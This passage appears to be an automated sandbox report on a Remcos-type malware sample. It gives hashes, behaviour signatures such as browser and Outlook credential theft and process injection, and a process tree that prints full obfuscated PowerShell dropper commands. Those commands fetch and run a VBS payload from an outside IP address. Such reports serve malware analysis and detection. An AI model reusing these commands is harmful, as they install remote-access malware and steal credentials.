| SHA256 | 72ff48b5bef2b1e3a3d47f6983bafbd4ec36518aeedfccb8fc05aa05f84265b3 |
| SHA512 | 0161e52e94d64012c6b4d4c56084d0c4338b52f35801ca67e16d16d649bc073bef9c4984190064abe47c48c209c2b9812852e681154b000e2ec141293d56a122 |
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
| MD5 | 7788462fff77921361629f1053e761ec |
| SHA1 | 9414413ddaa18d38c3f7cd7119e1958e8afcb5df |
| SHA256 | fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753 |
| SHA512 | e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | d48106066fe8aa44287a17e8fe159e23 |
| SHA1 | fae86d078b95c43050493b0ecce36a5103bec9e1 |
| SHA256 | 9998335b24b6d7cc3dec8d8b5490dcd1d3fecd2d323c23b1c5becb6f346370af |
| SHA512 | e06eaf0287cd6fae290e0c9cc02e2d5ae8bc1312eb2766e9232482f1b2f1edaea28d7d355229822a2c2748f51cdf743c71c1c19e7732c974369e1e99d5ece364 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-07 07:17
Reported
2024-08-07 07:20
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 1928 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 4312 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 2780 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1928 set thread context of 3612 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp" "c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴dwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBE≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dwBu≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴R≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQ≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴aw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BX≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴aQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LQBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴JwBG≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bwB3≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bm≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴B9≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBu≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴ZQBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴UwB5≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴LgBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴RQBu≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴bwBk≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴Og≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴FU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Dg≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ 